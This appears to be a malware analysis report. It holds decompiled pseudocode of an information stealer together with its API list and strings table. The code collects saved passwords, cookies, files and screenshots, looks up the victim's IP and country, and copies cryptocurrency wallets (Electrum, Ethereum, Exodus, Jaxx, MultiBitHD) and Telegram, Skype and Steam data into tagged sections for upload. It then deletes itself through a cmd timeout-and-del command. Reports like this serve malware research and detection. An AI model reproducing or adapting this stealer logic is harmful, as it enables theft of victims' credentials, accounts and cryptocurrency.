					E00403508( &_v532, 2);
					E00403BDC( &_v524);
					E00403508( &_v520, 2);
					E00403BDC( &_v512);
					E00403508( &_v508, 2);
					E00403BDC( &_v500);
					E00403508( &_v496, 2);
					E00403BDC( &_v488);
					E00403508( &_v484, 0xa);
					E00403BF4( &_v444, 2);
					E004034E4( &_v436);
					E00403BF4( &_v432, 3);
					E004034E4( &_v420);
					E00403BF4( &_v416, 2);
					E004034E4( &_v408);
					E00403BF4( &_v404, 8);
					E004034E4( &_v372);
					E00403BF4( &_v368, 4);
					E00403508( &_v352, 0xc);
					E004034E4( &_v68);
					_t1015 =  *0x405f50; // 0x405f54
					E00404280( &_v64, 5, _t1015);
					E00403508( &_v44, 8);
					E004034E4( &_v8);
					E00403508( &_v108, 5);
					return E00403508( &_v84, 3);
				}
				E0040357C( &_v16, 0x419888);
				E00416DD4( &_v16, __ebx, 0x80000, 0x419928, __edi, __esi);
				E004069A8(_v16, _t962,  &_v316, __edi, _t1157);
				E0040357C( &_v16, _v316);
				E00406CE8( &_v324, _t962, _t1157); // executed
				E00406834(_v324, _t962, 0x80000,  &_v320, _t1151, _t1157);
				E004037DC( &_v36, _v320, 0x419934);
				E00416DD4( &_v36, _t962, 0x80000, _v92, _t1151, _t1157);
				E00417D84(_v16, _t962, _v36, _t1151, _t1157,  &_v20); // executed
				E00416DD4( &_v20, _t962, 0x80000, _v92, _t1151, _t1157);
				_t1164 = E00403790(_v20) - 0x2710;
				if(_t1164 < 0) {
					goto L71;
				}
				E004038DC(_v20, 0x419940);
				if(_t1164 == 0) {
					goto L71;
				}
				E004074E8(0x419960, _t962, 0x419950, _v20, _t1157,  &_v328);
				E004069A8(_v328, _t962,  &_v40, _t1151, _t1157);
				E004074E8(0x41997c, _t962, 0x41996c, _v20, _t1157,  &_v332);
				E00406B08(_v332, _t962,  &_v44, _t1151, _t1157);
				E00407A18(0x419988,  &_v48, _v40, _t1164);
				_t977 = 0x419994;
				E004074E8(0x4199a4, _t962, 0x419994, _v20, _t1157,  &_v340);
				_t1035 =  &_v336;
				E004069A8(_v340, _t962,  &_v336, _t1151, _t1157);
				E00408180(_v336, _t1164);
				E00409668(_v44, _t962, _t1157, _t1164);
				E0040E630();
				_t1153 = E00404648(_v48) - 1;
				if(_t1153 < 0) {
					L51:
					_t238 =  &_v8; // 0x2b
					_push( *_t238);
					_push(0x419988);
					E0041698C( &_v460, _t962, _t1035, _t1153, _t1157);
					_push(_v460);
					E00403850();
					E0040E6D4(_v456, _t962, "System.txt", _t1153, _t1157);
					E00406CE8( &_v468, _t962, _t1157);
					E00406834(_v468, _t962, _t977,  &_v464, _t1153, _t1157);
					_push(_v464);
					_push(0x419ec0);
					E00407B08( &_v476, _t962, _t1153, _t1157);
					E00406834(_v476, _t962, _t977,  &_v472, _t1153, _t1157);
					_push(_v472);
					_push(0x419ec0);
					E00406BD8( &_v488);
					E0040377C( &_v484, _v488);
					E00406834(_v484, _t962, _t977,  &_v480, _t1153, _t1157);
					_push(_v480);
					_push(0x419ec0);
					E004066E4( &_v500, _t1192);
					E0040377C( &_v496, _v500);
					E00406834(_v496, _t962, _t977,  &_v492, _t1153, _t1157);
					_push(_v492);
					_push(0x419ec0);
					E00406634( &_v512);
					E0040377C( &_v508, _v512);
					E00406834(_v508, _t962, _t977,  &_v504, _t1153, _t1157);
					_push(_v504);
					_push(0x419ec0);
					E004065F0( &_v524);
					E0040377C( &_v520, _v524);
					E00406834(_v520, _t962, _t977,  &_v516, _t1153, _t1157);
					_push(_v516);
					_push(0x419ec0);
					_t616 =  *0x41b2a8; // 0x41b0b8
					E0040709C( *_t616, _t962,  &_v536, _t1157, _t1192);
					E0040377C( &_v532, _v536);
					E00406834(_v532, _t962, _t977,  &_v528, _t1153, _t1157);
					_push(_v528);
					_push(0x419ec0);
					_t623 =  *0x41b2c4; // 0x41b0b0
					E0040709C( *_t623, _t962,  &_v548, _t1157, _t1192);
					E0040377C( &_v544, _v548);
					E00406834(_v544, _t962, _t977,  &_v540, _t1153, _t1157);
					_push(_v540);
					_push(0x419ec0);
					_t630 =  *0x41b1cc; // 0x41b0b4
					E0040709C( *_t630, _t962,  &_v560, _t1157, _t1192);
					E0040377C( &_v556, _v560);
					E00406834(_v556, _t962, _t977,  &_v552, _t1153, _t1157);
					_push(_v552);
					_push(0x419ec0);
					_t637 =  *0x41b3f8; // 0x41b0ac
					E0040709C( *_t637, _t962,  &_v572, _t1157, _t1192);
					E0040377C( &_v568, _v572);
					E00406834(_v568, _t962, _t977,  &_v564, _t1153, _t1157);
					_push(_v564);
					_push(0x419ec0);
					E00406834(_v8, _t962, _t977,  &_v576, _t1153, _t1157);
					_push(_v576);
					_push(0x419ec0);
					E00407DE0( &_v584, _t1192);
					E00406834(_v584, _t962, _t977,  &_v580, _t1153, _t1157);
					_push(_v580);
					E00403850();
					_push("<info");
					_t651 =  *0x41b350; // 0x41b0bc
					_push( *_t651);
					_push(0x419edc);
					_push(_v28);
					_push("</info");
					_t652 =  *0x41b350; // 0x41b0bc
					_push( *_t652);
					_push(0x419edc);
					_push(0x419988);
					_push("<pwds");
					_t653 =  *0x41b350; // 0x41b0bc
					_push( *_t653);
					_push(0x419edc);
					E004063C8( &_v588, _t962, _t1153, _t1157);
					_push(_v588);
					_push("</pwds");
					_t656 =  *0x41b350; // 0x41b0bc
					_push( *_t656);
					_push(0x419edc);
					_push(0x419988);
					_push("<coks");
					_t657 =  *0x41b350; // 0x41b0bc
					_push( *_t657);
					_push(0x419edc);
					E00406560( &_v592, _t962, _t977, _t1153, _t1157);
					_push(_v592);
					_push("</coks");
					_t660 =  *0x41b350; // 0x41b0bc
					_push( *_t660);
					_push(0x419edc);
					_push(0x419988);
					_push("<file");
					_t661 =  *0x41b350; // 0x41b0bc
					_push( *_t661);
					_push(0x419edc);
					E0040E8D0( &_v596, _t962, _t1192);
					_push(_v596);
					_push("</file");
					_t664 =  *0x41b350; // 0x41b0bc
					_push( *_t664);
					_push(0x419edc);
					_push(0x419988);
					E00403850();
					_t1193 = _v85 - 1;
					if(_v85 == 1) {
						_push(_v24);
						_push("<ip");
						_t751 =  *0x41b350; // 0x41b0bc
						_push( *_t751);
						_push(0x419edc);
						_push(_v80);
						_push(0x419e90);
						_push(_v84);
						_push("</ip");
						_t752 =  *0x41b350; // 0x41b0bc
						_push( *_t752);
						_push(0x419edc);
						_push(0x419988);
						E00403850();
					}
					E00416DD4( &_v24, _t962, 0x80000, _v92, _t1153, _t1157);
					_t979 = 0;
					E00417D84(_v16, _t962, _v24, _t1153, _t1157,  &_v600);
					_t672 =  *0x41b3a0; // 0x41c6a0
					 *((intOrPtr*)( *_t672))(_v112);
					E00405114(0x419f74, _t962, _t1153, _t1157, _t1193);
					_t678 = E00403790(_v76);
					_t1194 = _t678 - 3;
					if(_t678 <= 3) {
						L65:
						E004099C0(_t962, _t1157);
						E00407DE0( &_v608, _t1205);
						E004038DC(_v608, 0x419fa4);
						if(_t1205 != 0) {
							L68:
							E004038DC(_v8, 0x419fb0);
							if(__eflags == 0) {
								__eflags = _v86 - 1;
								if(_v86 == 1) {
									E004028E0( &_v304, 0x3c);
									_v304 = 0x3c;
									_v300 = 0x1c0;
									_v296 = 0;
									_v292 = 0;
									E004062FC(L"%comspec%",  &_v612, __eflags);
									_v288 = E00403D98(_v612);
									E004062FC(L"/c %WINDIR%\\system32\\timeout.exe 3 & del \"",  &_v620, __eflags);
									E00402754(0,  &_v632);
									E00403D88( &_v628, _v632);
									E004077C8(_v628, _t962, 0,  &_v624, _t1157, __eflags);
									E00403E78();
									_v284 = E00403D98(_v616);
									E00402754(0,  &_v644);
									E00403D88( &_v640, _v644);
									E00407854(_v640, _t962, 0,  &_v636, _t1157, __eflags);
									_v280 = E00403D98(_v636);
									__eflags = 0;
									_v276 = 0;
									_t715 =  *0x41b150; // 0x41c764
									 *((intOrPtr*)( *_t715))( &_v304, E0041A02C, _v624, _v620);
									ExitProcess(0);
								}
							}
							goto L71;
						}
						E004038DC(_v8, 0x419fb0);
						if(_t1205 != 0) {
							goto L68;
						}
						E00407E90(_t962, _t979, _t1153, _t1157, _t1205);
						goto L71;
					} else {
						_t979 =  &_v56;
						E00407A18(0x419988,  &_v56, _v76, _t1194);
						_t1153 = E00404648(_v56) - 1;
						if(_t1153 < 0) {
							goto L65;
						}
						_t1155 = _t1153 + 1;
						_t963 = 0;
						do {
							_push(0);
							E00404804();
							_t1161 = _t1161 + 4;
							_t979 =  &_v60;
							E00407A18(0x419db4,  &_v60,  *((intOrPtr*)(_v56 + _t963 * 4)), 0);
							_t1197 = E00404648(_v60) - 4;
							if(_t1197 != 0) {
								goto L64;
							}
							E004038DC( *_v60, 0x419f80);
							if(_t1197 != 0) {
								goto L64;
							}
							_t979 =  &_v64;
							E00407A18(0x419f8c,  &_v64,  *((intOrPtr*)(_v60 + 0xc)), _t1197);
							_v87 = 0;
							_t1157 = E00404648(_v64) - 1;
							if(_t1157 < 0) {
								L62:
								_t1203 = _v87 - 1;
								if(_v87 == 1) {
									E004038DC( *((intOrPtr*)(_v60 + 8)), 0x419f98);
									E0041841C( *((intOrPtr*)(_v60 + 4)), _t963, 0x419f00 | _t1203 == 0x00000000, _t1155, _t1157);
								}
								goto L64;
							}
							_t1157 = _t1157 + 1;
							_v72 = 0;
							while(1) {
								E0040633C( *((intOrPtr*)(_v64 + _v72 * 4)), _t963,  &_v604, _t1155, _t1157);
								_t1088 =  *0x41b154; // 0x41c66c
								_v87 = E00403AD4(_v604,  *_t1088) != 0;
								if(_v87 == 1) {
									goto L62;
								}
								_v72 = _v72 + 1;
								_t1157 = _t1157 - 1;
								if(_t1157 != 0) {
									continue;
								}
								goto L62;
							}
							goto L62;
							L64:
							_t963 = _t963 + 1;
							_t1155 = _t1155 - 1;
							_t1205 = _t1155;
						} while (_t1205 != 0);
						goto L65;
					}
				} else {
					_t1156 = _t1153 + 1;
					_t964 = 0;
					do {
						if(E00403790( *((intOrPtr*)(_v48 + _t964 * 4))) < 5) {
							goto L50;
						}
						if(_t964 != 0) {
							L34:
							_t757 = _v48;
							_t1186 =  *((char*)( *((intOrPtr*)(_t757 + _t964 * 4)))) - 0x46;
							if( *((char*)( *((intOrPtr*)(_t757 + _t964 * 4)))) != 0x46) {
								L44:
								if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)))) == 0x4c) {
									_push(_v76);
									_push( *((intOrPtr*)(_v48 + _t964 * 4)));
									_push(0x419988);
									_t1035 = 3;
									E00403850();
								}
								_t1191 =  *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)))) - 0x49;
								if(_t1191 == 0) {
									_t977 =  &_v52;
									E00407A18(0x419db4,  &_v52,  *((intOrPtr*)(_v48 + _t964 * 4)), _t1191);
									E004038DC( *((intOrPtr*)(_v52 + 4)), 0x419e20);
									if(_t1191 != 0) {
										_t1035 = "ip.txt";
										E0040E6D4( *((intOrPtr*)(_v52 + 4)), _t964, "ip.txt", _t1156, _t1157);
									} else {
										_v85 = 1;
										E00417D84("http://ip-api.com/json", _t964, 0, _t1156, _t1157,  &_v32);
										E004074E8("\"query\":\"", _t964, 0x419e58, _v32, _t1157,  &_v80);
										_t977 = 0x419e58;
										E004074E8("\"countryCode\":\"", _t964, 0x419e58, _v32, _t1157,  &_v84);
										_push(_v80);
										_push(0x419e90);
										_push(_v84);
										E00403850();
										_t1035 = "ip.txt";
										E0040E6D4(_v452, _t964, "ip.txt", _t1156, _t1157);
									}
								}
								goto L50;
							}
							E00407A18(0x419db4,  &_v52,  *((intOrPtr*)(_v48 + _t964 * 4)), _t1186);
							E0040357C( &_v96,  *((intOrPtr*)(_v52 + 8)));
							if(E00403AD4(0x419dc0, _v96) != 1) {
								E00403D88( &_v424,  *((intOrPtr*)(_v52 + 0x1c)));
								_push(_v424);
								E00403D88( &_v428,  *((intOrPtr*)(_v52 + 0x10)));
								_push(E00407108(_v428, _t964,  &_v52, __eflags));
								_push(E004038DC( *((intOrPtr*)(_v52 + 0x14)), 0x419e04) & 0xffffff00 | __eflags == 0x00000000);
								_t807 = E004038DC( *((intOrPtr*)(_v52 + 0x18)), 0x419e04);
								_t192 = __eflags == 0;
								__eflags = _t192;
								_push(_t807 & 0xffffff00 | _t192);
								_push(1);
								_push("Files\\");
								_push( *((intOrPtr*)(_v52 + 4)));
								_push(0x419de8);
								E00403850();
								E00403D88( &_v432, _v436);
								_push(_v432);
								E00403D88( &_v440,  *((intOrPtr*)(_v52 + 0xc)));
								_push(_v440);
								E004037DC( &_v448, 0x419de8,  *((intOrPtr*)(_v52 + 8)));
								E00403D88( &_v444, _v448);
								_pop(_t1035);
								_pop(_t977);
								E00413F58(_v444, _t964, _t977, _t1035, _t1156, _t1157);
								goto L44;
							}
							_t977 = 0x419dd0;
							_t1035 = _v96;
							E004074E8(0x419dc0, _t964, 0x419dd0, _v96, _t1157,  &_v108);
							_push( &_v241);
							_push(0x81);
							_t828 =  *0x41b240; // 0x41c6f8
							if( *((intOrPtr*)( *_t828))() == 0) {
								goto L71;
							}
							_t1157 =  &_v241;
							while( *_t1157 != 0) {
								_t831 =  *0x41b114; // 0x41c6fc
								E0040709C( *((intOrPtr*)( *_t831))(_t1157), _t964,  &_v356, _t1157, __eflags);
								E0040377C( &_v352, _v356);
								_t1035 = _v108;
								_t838 = E00403AD4(_v352, _v108);
								__eflags = _t838;
								if(_t838 != 0) {
									_push( &_v360);
									E00403CF4( &_v364, _t1157);
									_push(_v364);
									_push("%DSK_");
									_push(_v108);
									E00403850();
									E00403D88( &_v368, _v372);
									_push(_v368);
									E00403D88( &_v376, _v96);
									_pop(_t1125);
									_t989 = 0x419ddc;
									E0040717C(_v376, _t964, _t989, _t1125);
									E0040377C( &_v104, _v360);
									E004034E4( &_v100);
									_push( *((intOrPtr*)(_v52 + 4)));
									_push(0x419de8);
									_push(_v104);
									E00403850();
									E00403D88( &_v384, _v100);
									E0040717C(_v384, _t964, 0, 0x419df0,  &_v380);
									E00403DB4( &_v380, 0, 0x419df8, __eflags);
									E0040377C( &_v100, _v380);
									E00403D88( &_v392, _v100);
									E004078D8(_v392, _t964,  &_v388, __eflags);
									E0040377C( &_v100, _v388);
									E00403D88( &_v396,  *((intOrPtr*)(_v52 + 0x1c)));
									_push(_v396);
									E00403D88( &_v400,  *((intOrPtr*)(_v52 + 0x10)));
									_push(E00407108(_v400, _t964, 0, __eflags));
									_push(E004038DC( *((intOrPtr*)(_v52 + 0x14)), 0x419e04) & 0xffffff00 | __eflags == 0x00000000);
									_t885 = E004038DC( *((intOrPtr*)(_v52 + 0x18)), 0x419e04);
									_t162 = __eflags == 0;
									__eflags = _t162;
									_push(_t885 & 0xffffff00 | _t162);
									_push(1);
									E004037DC( &_v408, _v100, "Files\\");
									E00403D88( &_v404, _v408);
									_push(_v404);
									E00403D88( &_v412,  *((intOrPtr*)(_v52 + 0xc)));
									_push(_v412);
									E004037DC( &_v420, 0x419de8, _v104);
									E00403D88( &_v416, _v420);
									_pop(_t1035);
									_pop(_t977);
									E00413F58(_v416, _t964, _t977, _t1035, _t1156, _t1157);
								}
								_t1157 = _t1157 + 4;
								__eflags = _t1157;
							}
							goto L44;
						} else {
							_t902 =  *((intOrPtr*)(_v48 + _t964 * 4));
							_t1169 =  *((char*)(_t902 + 1)) - 0x2b;
							if( *((char*)(_t902 + 1)) == 0x2b) {
								E0040E1DC(_t964, _t1035, _t1156, _t1157, _t1169, _t1207);
								E00405424( &_v344);
								_t1035 = "PasswordsList.txt";
								E0040E6D4(_v344, _t964, "PasswordsList.txt", _t1156, _t1157);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 2)) == 0x2b) {
								E00413BB4();
								E00405574( &_v348);
								_t1118 =  *0x41b2fc; // 0x41ca18
								_t1035 =  *_t1118;
								E0040E6D4(_v348, _t964,  *_t1118, _t1156, _t1157);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 9)) == 0x2b) {
								E00413BE8();
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 3)) == 0x2b) {
								E00414DE8(L"Coins", _t964, _t1156, _t1157);
								_t934 = E00413F58(L"%appdata%\\Electrum\\wallets\\", _t964, L"Coins\\Electrum", 0x4199fc, _t1156, _t1157, 0, 0, 1, 0x7d0, 0);
								_t1111 =  *0x41b2c4; // 0x41b0b0
								 *_t1111 =  *_t1111 + _t934;
								_t936 = E00413F58(L"%appdata%\\Electrum-LTC\\wallets\\", _t964, L"Coins\\Electrum-LTC", 0x4199fc, _t1156, _t1157, 0, 0, 1, 0x7d0, 0);
								_t1113 =  *0x41b2c4; // 0x41b0b0
								 *_t1113 =  *_t1113 + _t936;
								_t938 = E00413F58(L"%APPDATA%\\Ethereum\\keystore\\", _t964, L"Coins\\Ethereum", L"UTC*", _t1156, _t1157, 0, 0, 1, 0x1388, 0);
								_t1115 =  *0x41b2c4; // 0x41b0b0
								 *_t1115 =  *_t1115 + _t938;
								if(E00413F58(L"%APPDATA%\\Exodus\\", _t964, L"Coins\\Exodus", L"*.json,*.seco", _t1156, _t1157, 0, 0, 1, 0x1388, 0) > 0) {
									_t950 =  *0x41b2c4; // 0x41b0b0
									 *_t950 =  *_t950 + 1;
								}
								if(E00413F58(L"%APPDATA%\\Jaxx\\Local Storage\\", _t964, L"Coins\\Jaxx\\Local Storage\\", 0x4199fc, _t1156, _t1157, 0, 0, 1, 0x1388, 0) > 0) {
									_t949 =  *0x41b2c4; // 0x41b0b0
									 *_t949 =  *_t949 + 1;
								}
								_t977 = L"Coins\\MultiBitHD";
								_t1035 = L"mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml";
								if(E00413F58(L"%APPDATA%\\MultiBitHD\\", _t964, L"Coins\\MultiBitHD", L"mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml", _t1156, _t1157, 0, 0, 1, 0x1388, 0) > 0) {
									_t948 =  *0x41b2c4; // 0x41b0b0
									 *_t948 =  *_t948 + 1;
								}
								_t945 =  *0x41b2c4; // 0x41b0b0
								_t1179 =  *_t945;
								if( *_t945 > 0) {
									E00405114(0x419cd8, _t964, _t1156, _t1157, _t1179);
								}
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 4)) == 0x2b) {
								E00414808(L"Skype", _t964, _t1156, _t1157);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 5)) == 0x2b) {
								_t977 = L"Telegram";
								_t1035 = L"D877F783D5*,map*";
								E00413F58(L"%appdata%\\Telegram Desktop\\tdata\\", _t964, L"Telegram", L"D877F783D5*,map*", _t1156, _t1157, 0, 0, 1, 0x3e8, 0);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 6)) == 0x2b) {
								E00414A90(L"Steam", _t964, _t1156, _t1157);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 7)) == 0x2b) {
								_push(0);
								_push(0x32);
								_push(L"image/jpeg");
								_push( &_v68);
								_push(GetSystemMetrics(1));
								_t921 = GetSystemMetrics(0);
								_t977 = 0;
								_pop(_t1109);
								E00416FB0(_t921, _t964, 0, _t1109, _t1156, _t1157);
								_t1035 = "scr.jpg";
								E0040E6D4(_v68, _t964, "scr.jpg", _t1156, _t1157);
							}
							if( *((char*)( *((intOrPtr*)(_v48 + _t964 * 4)) + 8)) == 0x2b) {
								_v86 = 1;
							}
							goto L34;
						}
						L50:
						_t964 = _t964 + 1;
						_t1156 = _t1156 - 1;
						_t1192 = _t1156;
					} while (_t1156 != 0);
					goto L51;
				}
			}

0x004186c4
0x004186c4
0x004186c4
0x004186c4
0x004186c5
0x004186c7
0x004186cc
0x004186cc
0x004186ce
0x004186d0
0x004186d0
0x004186d0
0x004186d3
0x004186d4
0x004186d5
0x004186d6
0x004186dc
0x004186e3
0x004186e4
0x004186e9
0x004186ec
0x004186f2
0x004186f7
0x004186fb
0x00418707
0x0041870c
0x00418717
0x00418722
0x00418729
0x00418734
0x00418735
0x00418751
0x00418753
0x00418756
0x00418764
0x0041965c
0x0041965e
0x00419661
0x00419664
0x0041966f
0x0041967f
0x0041968a
0x0041969a
0x004196aa
0x004196b5
0x004196c5
0x004196d0
0x004196e0
0x004196eb
0x004196fb
0x00419706
0x00419716
0x00419721
0x00419731
0x0041973c
0x0041974c
0x00419757
0x00419767
0x00419772
0x00419782
0x00419792
0x0041979d
0x004197ad
0x004197b8
0x004197c8
0x004197d3
0x004197e3
0x004197ee
0x004197fe
0x0041980e
0x00419816
0x0041981e
0x00419829
0x00419836
0x0041983e
0x0041984b
0x0041985d
0x0041985d
0x00418772
0x00418784
0x00418792
0x004187a0
0x004187ab
0x004187bc
0x004187cf
0x004187df
0x004187f0
0x00418800
0x0041880d
0x00418812
0x00000000
0x00000000
0x00418820
0x00418825
0x00000000
0x00000000
0x0041883f
0x0041884d
0x00418866
0x00418874
0x00418884
0x00418890
0x0041889d
0x004188a8
0x004188ae
0x004188b9
0x004188c1
0x004188c8
0x004188d7
0x004188da
0x00418fb5
0x00418fb5
0x00418fb5
0x00418fb8
0x00418fc3
0x00418fc8
0x00418fd9
0x00418fe9
0x00418ff4
0x00419005
0x0041900a
0x00419010
0x0041901b
0x0041902c
0x00419031
0x00419037
0x00419042
0x00419053
0x00419064
0x00419069
0x0041906f
0x0041907a
0x0041908b
0x0041909c
0x004190a1
0x004190a7
0x004190b2
0x004190c3
0x004190d4
0x004190d9
0x004190df
0x004190ea
0x004190fb
0x0041910c
0x00419111
0x00419117
0x00419122
0x00419129
0x0041913a
0x0041914b
0x00419150
0x00419156
0x00419161
0x00419168
0x00419179
0x0041918a
0x0041918f
0x00419195
0x004191a0
0x004191a7
0x004191b8
0x004191c9
0x004191ce
0x004191d4
0x004191df
0x004191e6
0x004191f7
0x00419208
0x0041920d
0x00419213
0x00419221
0x00419226
0x0041922c
0x00419237
0x00419248
0x0041924d
0x0041925b
0x00419260
0x00419265
0x0041926a
0x0041926c
0x00419271
0x00419274
0x00419279
0x0041927e
0x00419280
0x00419285
0x0041928a
0x0041928f
0x00419294
0x00419296
0x004192a1
0x004192a6
0x004192ac
0x004192b1
0x004192b6
0x004192b8
0x004192bd
0x004192c2
0x004192c7
0x004192cc
0x004192ce
0x004192d9
0x004192de
0x004192e4
0x004192e9
0x004192ee
0x004192f0
0x004192f5
0x004192fa
0x004192ff
0x00419304
0x00419306
0x00419311
0x00419316
0x0041931c
0x00419321
0x00419326
0x00419328
0x0041932d
0x0041933a
0x0041933f
0x00419343
0x00419345
0x00419348
0x0041934d
0x00419352
0x00419354
0x00419359
0x0041935c
0x00419361
0x00419364
0x00419369
0x0041936e
0x00419370
0x00419375
0x00419382
0x00419382
0x00419392
0x0041939e
0x004193a6
0x004193af
0x004193b6
0x004193bd
0x004193c5
0x004193ca
0x004193cd
0x004194dd
0x004194dd
0x004194e8
0x004194f8
0x004194fd
0x00419518
0x00419520
0x00419525
0x0041952b
0x0041952f
0x00419542
0x00419547
0x00419551
0x0041955d
0x00419565
0x00419576
0x00419586
0x00419597
0x004195aa
0x004195bb
0x004195cc
0x004195e7
0x004195f7
0x00419605
0x00419616
0x00419627
0x00419637
0x0041963d
0x0041963f
0x0041964c
0x00419653
0x00419657
0x00419657
0x0041952f
0x00000000
0x00419525
0x00419507
0x0041950c
0x00000000
0x00000000
0x0041950e
0x00000000
0x004193d3
0x004193d3
0x004193de
0x004193ed
0x004193f0
0x00000000
0x00000000
0x004193f6
0x004193f7
0x004193f9
0x004193f9
0x00419409
0x0041940e
0x00419411
0x0041941f
0x0041942c
0x0041942f
0x00000000
0x00000000
0x0041943f
0x00419444
0x00000000
0x00000000
0x0041944a
0x00419458
0x0041945d
0x0041946b
0x0041946e
0x004194b1
0x004194b1
0x004194b5
0x004194c2
0x004194d0
0x004194d0
0x00000000
0x004194b5
0x00419470
0x00419471
0x00419478
0x00419487
0x00419492
0x004194a1
0x004194a9
0x00000000
0x00000000
0x004194ab
0x004194ae
0x004194af
0x00000000
0x00000000
0x00000000
0x004194af
0x00000000
0x004194d5
0x004194d5
0x004194d6
0x004194d6
0x004194d6
0x00000000
0x004193f9
0x004188e0
0x004188e0
0x004188e1
0x004188e3
0x004188f1
0x00000000
0x00000000
0x004188f9
0x00418b3e
0x00418b3e
0x00418b44
0x00418b47
0x00418ed1
0x00418eda
0x00418edc
0x00418ee2
0x00418ee5
0x00418eed
0x00418ef2
0x00418ef2
0x00418efd
0x00418f00
0x00418f06
0x00418f14
0x00418f24
0x00418f29
0x00418fa3
0x00418fa8
0x00418f2b
0x00418f2b
0x00418f3f
0x00418f55
0x00418f5e
0x00418f6b
0x00418f70
0x00418f73
0x00418f78
0x00418f86
0x00418f91
0x00418f96
0x00418f96
0x00418f29
0x00000000
0x00418f00
0x00418b5b
0x00418b69
0x00418b7c
0x00418dfa
0x00418e05
0x00418e12
0x00418e22
0x00418e36
0x00418e42
0x00418e47
0x00418e47
0x00418e4a
0x00418e4b
0x00418e4d
0x00418e55
0x00418e58
0x00418e68
0x00418e79
0x00418e84
0x00418e91
0x00418e9c
0x00418eae
0x00418ebf
0x00418eca
0x00418ecb
0x00418ecc
0x00000000
0x00418ecc
0x00418b86
0x00418b8b
0x00418b93
0x00418b9e
0x00418b9f
0x00418ba4
0x00418baf
0x00000000
0x00000000
0x00418bb5
0x00418de0
0x00418bc1
0x00418bd0
0x00418be1
0x00418bec
0x00418bef
0x00418bf4
0x00418bf6
0x00418c02
0x00418c0b
0x00418c16
0x00418c17
0x00418c1c
0x00418c2f
0x00418c40
0x00418c4b
0x00418c55
0x00418c60
0x00418c61
0x00418c62
0x00418c70
0x00418c78
0x00418c80
0x00418c83
0x00418c88
0x00418c93
0x00418ca8
0x00418cba
0x00418cca
0x00418cd8
0x00418ce6
0x00418cf7
0x00418d05
0x00418d16
0x00418d21
0x00418d2e
0x00418d3e
0x00418d52
0x00418d5e
0x00418d63
0x00418d63
0x00418d66
0x00418d67
0x00418d77
0x00418d88
0x00418d93
0x00418da0
0x00418dab
0x00418dba
0x00418dcb
0x00418dd6
0x00418dd7
0x00418dd8
0x00418dd8
0x00418ddd
0x00418ddd
0x00418ddd
0x00000000
0x004188ff
0x00418902
0x00418905
0x00418909
0x0041890b
0x00418916
0x00418921
0x00418926
0x00418926
0x00418935
0x00418937
0x00418942
0x0041894d
0x00418953
0x00418955
0x00418955
0x00418964
0x00418966
0x00418966
0x00418975
0x00418980
0x004189a1
0x004189a6
0x004189ac
0x004189ca
0x004189cf
0x004189d5
0x004189f3
0x004189f8
0x004189fe
0x00418a23
0x00418a25
0x00418a2a
0x00418a2a
0x00418a4f
0x00418a51
0x00418a56
0x00418a56
0x00418a65
0x00418a6a
0x00418a7b
0x00418a7d
0x00418a82
0x00418a82
0x00418a84
0x00418a89
0x00418a8c
0x00418a93
0x00418a93
0x00418a8c
0x00418aa2
0x00418aa9
0x00418aa9
0x00418ab8
0x00418ac7
0x00418acc
0x00418ad6
0x00418ad6
0x00418ae5
0x00418aec
0x00418aec
0x00418afb
0x00418afd
0x00418aff
0x00418b01
0x00418b09
0x00418b11
0x00418b14
0x00418b19
0x00418b1b
0x00418b1c
0x00418b21
0x00418b29
0x00418b29
0x00418b38
0x00418b3a
0x00418b3a
0x00000000
0x00418b38
0x00418fad
0x00418fad
0x00418fae
0x00418fae
0x00418fae
0x00000000
0x004188e3

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00418751

Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
Part of subcall function 00409668: LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C

GetSystemMetrics.USER32 ref: 00418B0C
GetSystemMetrics.USER32 ref: 00418B14
ExitProcess.KERNEL32(00000000), ref: 00419657

Strings

GET, xrefs: 00418F33
<c>, xrefs: 0041883A
exit, xrefs: 0041881B
"query":", xrefs: 00418F50
</file, xrefs: 0041931C
</info, xrefs: 00419274
/c %WINDIR%\system32\timeout.exe 3 & del ", xrefs: 00419592
D877F783D5*,map*, xrefs: 00418ACC
Files\, xrefs: 00418D72, 00418E4D
</pwds, xrefs: 004192AC
Coins, xrefs: 0041897B
Coins\MultiBitHD, xrefs: 00418A65
T_@, xrefs: 00419403, 0041981E
Coins\Jaxx\Local Storage\, xrefs: 00418A39
System.txt, xrefs: 00418FE4
%appdata%\Telegram Desktop\tdata\, xrefs: 00418AD1
%APPDATA%\Ethereum\keystore\, xrefs: 004189EE
http://ip-api.com/json, xrefs: 00418F3A
PasswordsList.txt, xrefs: 00418921
<coks, xrefs: 004192C2
<n>, xrefs: 00418861
%APPDATA%\Exodus\, xrefs: 00418A17
Coins\Exodus, xrefs: 00418A0D
</c>, xrefs: 00418832
Coins\Electrum, xrefs: 00418992
<pwds, xrefs: 0041928A
<file, xrefs: 004192FA
scr.jpg, xrefs: 00418B21
<ip, xrefs: 00419348
</d>, xrefs: 00418890
++++, xrefs: 00418FB5
</ip, xrefs: 00419364
</coks, xrefs: 004192E4
%appdata%\Electrum\wallets\, xrefs: 0041899C
UTC*, xrefs: 004189E9
*.json,*.seco, xrefs: 00418A12
